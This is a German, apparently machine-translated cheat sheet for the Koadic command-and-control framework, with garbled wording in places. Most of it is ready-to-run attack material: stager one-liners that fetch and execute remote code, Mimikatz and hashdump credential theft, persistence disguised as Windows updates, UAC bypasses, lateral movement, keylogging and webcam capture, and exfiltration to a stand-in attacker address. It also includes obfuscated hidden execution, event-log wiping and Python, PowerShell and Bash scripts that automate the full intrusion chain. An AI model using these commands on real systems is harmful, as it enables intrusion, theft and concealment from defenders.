Koadic C2 Framework Cheat Sheet
Überblick
Koadic ist ein Windows-Post-Exploitation-Framework, das COM-Objekte (Component Object Model) für Befehls- und Kontrolloperationen nutzt. In Python gebaut, konzentriert sich Koadic auf leben-off-the-land Techniken, mit legitimen Windows-Komponenten und JavaScript-Ausführung, um Beharrlichkeit zu erhalten und zu vermeiden, Erkennung und bietet umfassende Post-Exploitation Fähigkeiten.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install Python 3.6+ and pip
sudo apt update sudo apt install -y python3 python3-pip git
Install system dependencies
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
Verify Python version
python3 --version ```_
Installation von GitHub
```bash
Clone Koadic repository
git clone https://github.com/zerosum0x0/koadic.git cd koadic
Install requirements
pip3 install -r requirements.txt
Make executable
chmod +x koadic ```_
Docker Installation
```bash
Clone repository
git clone https://github.com/zerosum0x0/koadic.git cd koadic
Build Docker image
docker build -t koadic .
Run Koadic container
docker run -it --rm -p 9999:9999 koadic
Run with persistent data
docker run -it --rm -p 9999:9999 -v $(pwd)/data:/app/data koadic ```_
Kali Linux Installation
```bash
Install from Kali repositories
sudo apt update sudo apt install koadic
Or install from source
git clone https://github.com/zerosum0x0/koadic.git cd koadic pip3 install -r requirements.txt ```_
Basisnutzung
Starting Koadic
```bash
Start Koadic
python3 koadic
Start with specific interface
python3 koadic --ip 192.168.1.100
Start with custom port
python3 koadic --port 8080
Start in quiet mode
python3 koadic --quiet ```_
Kommandozeilenschnittstelle
```bash
Koadic command prompt
(koadic: sta/js/mshta)#
Get help
help
Show available modules
show
Use a module
use [module_path]
Set module options
set [option] [value]
Execute module
run
Background current session
background ```_
Grundlegende Befehle
```bash
List available stagers
show stagers
List available implants
show implants
List active zombies (compromised hosts)
zombies
Interact with zombie
zombie [zombie_id]
Kill zombie
zombie [zombie_id] kill ```_
Bühnen und Implantate
MSHTA Stage
```bash
Use MSHTA stager
use stager/js/mshta
Set options
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT sales
Generate stager
run
Generated command
mshta http://192.168.1.100:9999/sales
Execute on target
mshta.exe http://192.168.1.100:9999/sales ```_
Rundll32 Bühne
```bash
Use Rundll32 stager
use stager/js/rundll32_js
Set options
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT update
Generate stager
run
Generated command
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.100:9999/update",false);h.Send();eval(h.ResponseText);window.close(); ```_
Regsvr32 Bühne
```bash
Use Regsvr32 stager
use stager/js/regsvr32
Set options
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT api
Generate stager
run
Generated command
regsvr32 /s /n /u /i:http://192.168.1.100:9999/api scrobj.dll ```_
WScript Bühne
```bash
Use WScript stager
use stager/js/wscript
Set options
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT data
Generate stager
run
Generated command
wscript.exe //b //e:jscript \192.168.1.100\share\payload.js ```_
PowerShell Stage
```bash
Use PowerShell stager
use stager/js/powershell
Set options
set SRVHOST 192.168.1.100 set SRVPORT 9999 set ENDPOINT ps
Generate stager
run
Generated command
powershell.exe -exec bypass -window hidden -noni -nop -c "iex((new-object system.net.webclient).downloadstring('http://192.168.1.100:9999/ps'))" ```_
Zombie Management
Grundlegende Zombiebefehle
```bash
List all zombies
zombies
Get zombie information
zombie [zombie_id] info
Execute command on zombie
zombie [zombie_id] cmd "whoami"
Execute PowerShell on zombie
zombie [zombie_id] shell "Get-Process"
Kill zombie
zombie [zombie_id] kill
Rename zombie
zombie [zombie_id] rename [new_name] ```_
Zombie Interaktion
```bash
Interact with specific zombie
zombie [zombie_id]
Once in zombie context
whoami # Current user hostname # Computer name pwd # Current directory ls # List directory cd [path] # Change directory cat [file] # Read file download [file] # Download file upload [local] [remote] # Upload file ```_
Multi-Zombie Operationen
```bash
Execute command on all zombies
zombies cmd "systeminfo"
Execute on specific zombies
zombies 1,3,5 cmd "whoami"
Execute PowerShell on all zombies
zombies shell "Get-ComputerInfo"
Kill all zombies
zombies kill ```_
Implantatmodule
Systeminformationen
```bash
Get system information
use implant/gather/enum_system set ZOMBIE [zombie_id] run
Enumerate users
use implant/gather/enum_users set ZOMBIE [zombie_id] run
Enumerate processes
use implant/gather/enum_process set ZOMBIE [zombie_id] run
Enumerate services
use implant/gather/enum_services set ZOMBIE [zombie_id] run ```_
Credential Harvesting
```bash
Dump credentials with Mimikatz
use implant/gather/mimikatz set ZOMBIE [zombie_id] set COMMAND sekurlsa::logonpasswords run
Dump SAM database
use implant/gather/hashdump set ZOMBIE [zombie_id] run
Enumerate stored credentials
use implant/gather/enum_creds set ZOMBIE [zombie_id] run
Browser credential extraction
use implant/gather/enum_chrome set ZOMBIE [zombie_id] run ```_
Persistenzmechanismen
```bash
Registry persistence
use implant/persist/registry set ZOMBIE [zombie_id] set PAYLOAD [payload_path] set HIVE HKCU set KEY "Software\Microsoft\Windows\CurrentVersion\Run" set VALUE "WindowsUpdate" run
Scheduled task persistence
use implant/persist/schtasks set ZOMBIE [zombie_id] set PAYLOAD [payload_path] set TASKNAME "SystemUpdate" set TRIGGER "ONLOGON" run
Service persistence
use implant/persist/service set ZOMBIE [zombie_id] set PAYLOAD [payload_path] set SERVICENAME "WindowsUpdateService" run
WMI persistence
use implant/persist/wmi set ZOMBIE [zombie_id] set PAYLOAD [payload_path] set FILTERNAME "ProcessFilter" set CONSUMERNAME "ProcessConsumer" run ```_
Spätere Bewegung
```bash
WMI execution
use implant/lateral/wmi set ZOMBIE [zombie_id] set TARGET 192.168.1.100 set USERNAME administrator set PASSWORD password123 set COMMAND "whoami" run
PSExec execution
use implant/lateral/psexec set ZOMBIE [zombie_id] set TARGET 192.168.1.100 set USERNAME admin set PASSWORD pass123 set COMMAND "systeminfo" run
PowerShell remoting
use implant/lateral/winrm set ZOMBIE [zombie_id] set TARGET 192.168.1.100 set USERNAME administrator set PASSWORD password123 set COMMAND "Get-Process" run
SMB execution
use implant/lateral/smb set ZOMBIE [zombie_id] set TARGET 192.168.1.100 set SHARE C$ set USERNAME admin set PASSWORD pass123 set COMMAND "dir" run ```_
Vorrechte Eskalation
```bash
UAC bypass techniques
use implant/elevate/bypassuac_eventvwr set ZOMBIE [zombie_id] set PAYLOAD [payload_path] run
use implant/elevate/bypassuac_fodhelper set ZOMBIE [zombie_id] set PAYLOAD [payload_path] run
use implant/elevate/bypassuac_computerdefaults set ZOMBIE [zombie_id] set PAYLOAD [payload_path] run
Token manipulation
use implant/elevate/token_steal set ZOMBIE [zombie_id] set PID [target_pid] run
Service exploitation
use implant/elevate/service_unquoted set ZOMBIE [zombie_id] run ```_
Netzwerkaktivitäten
```bash
Port scanning
use implant/scan/tcp set ZOMBIE [zombie_id] set RHOSTS 192.168.1.0/24 set RPORTS 80,443,22,3389 run
Network discovery
use implant/gather/enum_network set ZOMBIE [zombie_id] run
ARP scanning
use implant/scan/arp set ZOMBIE [zombie_id] set NETWORK 192.168.1.0/24 run
SMB enumeration
use implant/gather/enum_shares set ZOMBIE [zombie_id] set TARGET 192.168.1.100 run ```_
Dateioperationen
```bash
File search
use implant/gather/file_search set ZOMBIE [zombie_id] set PATH C:\Users set PATTERN *.docx run
Directory listing
use implant/gather/dir_list set ZOMBIE [zombie_id] set PATH C:\Users\Administrator\Documents run
File download
use implant/gather/download set ZOMBIE [zombie_id] set RPATH C:\Users\Administrator\Documents\sensitive.docx set LPATH ./downloads/sensitive.docx run
File upload
use implant/manage/upload set ZOMBIE [zombie_id] set LPATH ./payloads/tool.exe set RPATH C:\Windows\Temp\tool.exe run ```_
Erweiterte Funktionen
Pivoting und Tunneling
```bash
SOCKS proxy
use implant/pivot/socks set ZOMBIE [zombie_id] set LPORT 1080 run
Port forwarding
use implant/pivot/portfwd set ZOMBIE [zombie_id] set LPORT 8080 set RHOST 192.168.1.100 set RPORT 80 run
Reverse port forwarding
use implant/pivot/rportfwd set ZOMBIE [zombie_id] set LPORT 3389 set RHOST 127.0.0.1 set RPORT 3389 run ```_
Keylogging und Screen Capture
```bash
Start keylogger
use implant/gather/keylogger set ZOMBIE [zombie_id] set DURATION 300 run
Screen capture
use implant/gather/screenshot set ZOMBIE [zombie_id] run
Webcam capture
use implant/gather/webcam set ZOMBIE [zombie_id] run
Audio recording
use implant/gather/microphone set ZOMBIE [zombie_id] set DURATION 60 run ```_
Daten Exfiltration
```bash
HTTP exfiltration
use implant/exfil/http set ZOMBIE [zombie_id] set LPATH C:\Users\Administrator\Documents\data.zip set URL http://192.168.1.100:8080/upload run
DNS exfiltration
use implant/exfil/dns set ZOMBIE [zombie_id] set LPATH C:\sensitive\data.txt set DOMAIN exfil.example.com run
Email exfiltration
use implant/exfil/email set ZOMBIE [zombie_id] set LPATH C:\data\sensitive.docx set SMTP smtp.gmail.com set USERNAME user@gmail.com set PASSWORD password123 set RECIPIENT attacker@evil.com run ```_
Automatisierung und Schrift
Python Automation Script
```python
!/usr/bin/env python3
Koadic automation script
import time import subprocess import json import os
class KoadicAutomation: def init(self, koadic_path="./koadic"): self.koadic_path = koadic_path self.zombies = []
def execute_command(self, command):
"""Execute Koadic command"""
try:
result = subprocess.run([
"python3", self.koadic_path,
"-c", command
], capture_output=True, text=True, timeout=30)
return result.stdout
except subprocess.TimeoutExpired:
return "Command timed out"
except Exception as e:
return f"Error: \\\\{str(e)\\\\}"
def setup_listener(self, host="192.168.1.100", port=9999):
"""Setup MSHTA listener"""
commands = [
"use stager/js/mshta",
f"set SRVHOST \\\\{host\\\\}",
f"set SRVPORT \\\\{port\\\\}",
"set ENDPOINT sales",
"run"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(1)
print(f"[+] Listener setup complete")
print(f"[+] Execute on target: mshta http://\\\\{host\\\\}:\\\\{port\\\\}/sales")
def get_zombies(self):
"""Get list of active zombies"""
result = self.execute_command("zombies")
# Parse zombie list from output
# Implementation depends on output format
return self.zombies
def automated_recon(self, zombie_id):
"""Perform automated reconnaissance"""
modules = [
"implant/gather/enum_system",
"implant/gather/enum_users",
"implant/gather/enum_process",
"implant/gather/enum_services",
"implant/gather/enum_network"
]
for module in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}",
"run"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(2)
def credential_harvesting(self, zombie_id):
"""Harvest credentials from zombie"""
modules = [
("implant/gather/mimikatz", "sekurlsa::logonpasswords"),
("implant/gather/hashdump", ""),
("implant/gather/enum_creds", ""),
("implant/gather/enum_chrome", "")
]
for module, command in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
if command:
commands.append(f"set COMMAND \\\\{command\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(3)
def establish_persistence(self, zombie_id):
"""Establish persistence on zombie"""
persistence_modules = [
("implant/persist/registry", \\\\{
"HIVE": "HKCU",
"KEY": "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"VALUE": "WindowsUpdate",
"PAYLOAD": "C:\\Windows\\Temp\\update.exe"
\\\\}),
("implant/persist/schtasks", \\\\{
"TASKNAME": "SystemUpdate",
"TRIGGER": "ONLOGON",
"PAYLOAD": "C:\\Windows\\Temp\\update.exe"
\\\\})
]
for module, options in persistence_modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
for key, value in options.items():
commands.append(f"set \\\\{key\\\\} \\\\{value\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(2)
def lateral_movement(self, zombie_id, targets):
"""Perform lateral movement"""
for target in targets:
modules = [
("implant/lateral/wmi", \\\\{
"TARGET": target,
"USERNAME": "administrator",
"PASSWORD": "password123",
"COMMAND": "whoami"
\\\\}),
("implant/lateral/psexec", \\\\{
"TARGET": target,
"USERNAME": "admin",
"PASSWORD": "pass123",
"COMMAND": "systeminfo"
\\\\})
]
for module, options in modules:
commands = [
f"use \\\\{module\\\\}",
f"set ZOMBIE \\\\{zombie_id\\\\}"
]
for key, value in options.items():
commands.append(f"set \\\\{key\\\\} \\\\{value\\\\}")
commands.append("run")
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(cmd)
time.sleep(3)
Usage example
def main(): automation = KoadicAutomation()
# Setup listener
automation.setup_listener("192.168.1.100", 9999)
# Wait for zombies to connect
print("[+] Waiting for zombies to connect...")
time.sleep(60)
# Get active zombies
zombies = automation.get_zombies()
for zombie_id in zombies:
print(f"[+] Processing zombie: \\\\{zombie_id\\\\}")
# Perform reconnaissance
automation.automated_recon(zombie_id)
# Harvest credentials
automation.credential_harvesting(zombie_id)
# Establish persistence
automation.establish_persistence(zombie_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
automation.lateral_movement(zombie_id, targets)
if name == "main": main() ```_
PowerShell Automation
```powershell
Koadic PowerShell automation script
function Invoke-KoadicAutomation \\{ param( [string]$KoadicPath = "./koadic", [string]$ListenerHost = "192.168.1.100", [int]$ListenerPort = 9999 )
function Execute-KoadicCommand \\\\{
param([string]$Command)
try \\\\{
$result = & python3 $KoadicPath -c $Command 2>&1
return $result
\\\\}
catch \\\\{
Write-Warning "Failed to execute command: $Command"
return $null
\\\\}
\\\\}
# Setup MSHTA listener
Write-Host "[+] Setting up MSHTA listener..."
$commands = @(
"use stager/js/mshta",
"set SRVHOST $ListenerHost",
"set SRVPORT $ListenerPort",
"set ENDPOINT sales",
"run"
)
foreach ($cmd in $commands) \\\\{
Write-Host "[+] Executing: $cmd"
Execute-KoadicCommand -Command $cmd
Start-Sleep -Seconds 1
\\\\}
Write-Host "[+] Listener setup complete"
Write-Host "[+] Execute on target: mshta http://$ListenerHost`:$ListenerPort/sales"
# Wait for zombies
Write-Host "[+] Waiting for zombies to connect..."
Start-Sleep -Seconds 60
# Get zombie list (simplified - would need proper parsing)
$zombieResult = Execute-KoadicCommand -Command "zombies"
# Process each zombie (example with zombie ID 0)
$zombieId = 0
Write-Host "[+] Processing zombie: $zombieId"
# Reconnaissance modules
$reconModules = @(
"implant/gather/enum_system",
"implant/gather/enum_users",
"implant/gather/enum_process",
"implant/gather/enum_services"
)
foreach ($module in $reconModules) \\{
Write-Host "[+] Running module: $module"
Execute-KoadicCommand -Command "use $module"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
Execute-KoadicCommand -Command "run"
Start-Sleep -Seconds 3
\\}
# Credential harvesting
Write-Host "[+] Harvesting credentials..."
$credModules = @(
@\\{Module = "implant/gather/mimikatz"; Command = "sekurlsa::logonpasswords"\\},
@\\{Module = "implant/gather/hashdump"; Command = ""\\},
@\\{Module = "implant/gather/enum_creds"; Command = ""\\}
)
foreach ($item in $credModules) \\{
Write-Host "[+] Running module: $($item.Module)"
Execute-KoadicCommand -Command "use $($item.Module)"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
if ($item.Command) \\{
Execute-KoadicCommand -Command "set COMMAND $($item.Command)"
\\}
Execute-KoadicCommand -Command "run"
Start-Sleep -Seconds 5
\\}
# Establish persistence
Write-Host "[+] Establishing persistence..."
Execute-KoadicCommand -Command "use implant/persist/registry"
Execute-KoadicCommand -Command "set ZOMBIE $zombieId"
Execute-KoadicCommand -Command "set HIVE HKCU"
Execute-KoadicCommand -Command "set KEY Software\Microsoft\Windows\CurrentVersion\Run"
Execute-KoadicCommand -Command "set VALUE WindowsUpdate"
Execute-KoadicCommand -Command "set PAYLOAD C:\Windows\Temp\update.exe"
Execute-KoadicCommand -Command "run"
Write-Host "[+] Automation completed"
\}
Execute automation
Invoke-KoadicAutomation -ListenerHost "192.168.1.100" -ListenerPort 9999 ```_
Bash Automation Script
```bash
!/bin/bash
Koadic bash automation script
KOADIC_PATH="./koadic" LISTENER_HOST="192.168.1.100" LISTENER_PORT="9999"
Function to execute Koadic commands
execute_koadic_command() \{ local command="$1" echo "[+] Executing: $command" python3 "$KOADIC_PATH" -c "$command" sleep 1 \}
Setup MSHTA listener
echo "[+] Setting up MSHTA listener..." execute_koadic_command "use stager/js/mshta" execute_koadic_command "set SRVHOST $LISTENER_HOST" execute_koadic_command "set SRVPORT $LISTENER_PORT" execute_koadic_command "set ENDPOINT sales" execute_koadic_command "run"
echo "[+] Listener setup complete" echo "[+] Execute on target: mshta http://$LISTENER_HOST:$LISTENER_PORT/sales"
Wait for zombies
echo "[+] Waiting for zombies to connect..." sleep 60
Process zombie (example with zombie ID 0)
ZOMBIE_ID=0 echo "[+] Processing zombie: $ZOMBIE_ID"
Reconnaissance
echo "[+] Performing reconnaissance..." recon_modules=( "implant/gather/enum_system" "implant/gather/enum_users" "implant/gather/enum_process" "implant/gather/enum_services" "implant/gather/enum_network" )
for module in "$\{recon_modules[@]\}"; do echo "[+] Running module: $module" execute_koadic_command "use $module" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "run" sleep 3 done
Credential harvesting
echo "[+] Harvesting credentials..." execute_koadic_command "use implant/gather/mimikatz" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "set COMMAND sekurlsa::logonpasswords" execute_koadic_command "run" sleep 5
execute_koadic_command "use implant/gather/hashdump" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "run" sleep 5
Establish persistence
echo "[+] Establishing persistence..." execute_koadic_command "use implant/persist/registry" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "set HIVE HKCU" execute_koadic_command "set KEY Software\Microsoft\Windows\CurrentVersion\Run" execute_koadic_command "set VALUE WindowsUpdate" execute_koadic_command "set PAYLOAD C:\Windows\Temp\update.exe" execute_koadic_command "run"
execute_koadic_command "use implant/persist/schtasks" execute_koadic_command "set ZOMBIE $ZOMBIE_ID" execute_koadic_command "set TASKNAME SystemUpdate" execute_koadic_command "set TRIGGER ONLOGON" execute_koadic_command "set PAYLOAD C:\Windows\Temp\update.exe" execute_koadic_command "run"
echo "[+] Automation completed" ```_
Integration mit anderen Tools
Metasploit Integration
```bash
Use Koadic for initial access, pivot to Metasploit
Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Koadic zombie
use implant/manage/upload set ZOMBIE [zombie_id] set LPATH ./meterpreter.exe set RPATH C:\Windows\Temp\update.exe run
Execute Metasploit payload
zombie [zombie_id] cmd "C:\Windows\Temp\update.exe"
Handle in Metasploit
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Integrieren der Welt
```bash
Generate Empire stager
Use Koadic for initial access, pivot to Empire
From Koadic zombie
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
Handle in Empire
./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```_
Cobalt Strike Integration
```bash
Beacon integration
Generate Cobalt Strike beacon
Use Koadic for initial access, pivot to Beacon
From Koadic zombie
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server
```_
Operationelle Sicherheit
Kommunikationssicherheit
```bash
Use HTTPS with valid certificates
Configure domain fronting
Implement certificate pinning
Use legitimate user agents
Example HTTPS configuration
Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Configure Koadic with SSL (if supported)
Use reverse proxy with SSL termination
```_
Verkehrsobfukation
```bash
Use legitimate Windows binaries
Implement jitter and delays
Mimic legitimate traffic patterns
Use common ports and protocols
Example obfuscated execution
mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """"& \{Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 30); IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100:9999/sales')\}"""", 0, False")(window.close) ```_
Anti-Forensik
```bash
Clear event logs
zombie [zombie_id] cmd "wevtutil cl System" zombie [zombie_id] cmd "wevtutil cl Security" zombie [zombie_id] cmd "wevtutil cl Application"
Clear PowerShell history
zombie [zombie_id] shell "Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
Timestomping
zombie [zombie_id] shell "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'" ```_
Fehlerbehebung
Gemeinsame Themen
```bash
Zombie not connecting
- Check firewall rules
- Verify listener configuration
- Test network connectivity
- Check antivirus interference
Python dependency issues
pip3 install --upgrade -r requirements.txt
Module execution failures
Check zombie status
zombies
Verify module options
show options ```_
Debug Mode
```bash
Enable verbose logging
python3 koadic --verbose
Check network connectivity
telnet 192.168.1.100 9999
Test stager execution
mshta http://192.168.1.100:9999/sales ```_
Best Practices
Betriebsplanung
- *Pre-engagement Setup: Bühnen- und Hörer vor dem Engagement konfigurieren
- Zombie Management: Deskriptive Zombie-Namen verwenden und durch Netzwerk organisieren
- ** Kommunikationsprotokolle*: Sichere C2-Kommunikationskanäle erstellen
- Datenhandling: Implementierung einer sicheren Datenerfassung und -speicherung
- *Cleanup-Verfahren Plan für Artefakte Entfernung und Zombie-Reinigung
Sicherheitsüberlegungen
```bash
Secure deployment
Use strong authentication
Enable HTTPS with valid certificates
Implement network segmentation
Regular security updates
Zombie management
Use unique zombie identifiers
Implement zombie timeouts
Regular zombie rotation
Secure communication channels
```_
Dokumentation und Reporting
```bash
Operation documentation
Maintain zombie logs
Document all activities
Track compromised systems
Generate executive reports
Artifact tracking
Monitor IOCs
Document forensic artifacts
Implement attribution prevention
```_
Ressourcen
- [Koadic GitHub Repository](__LINK_5___ -%20Koadische%20Dokumentation
- (__LINK_5___)
- [MITRE ATT&CK; Framework](LINK_5___ -%20(SANS%20Red%20Team%20Operations)(__LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Koadic C2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *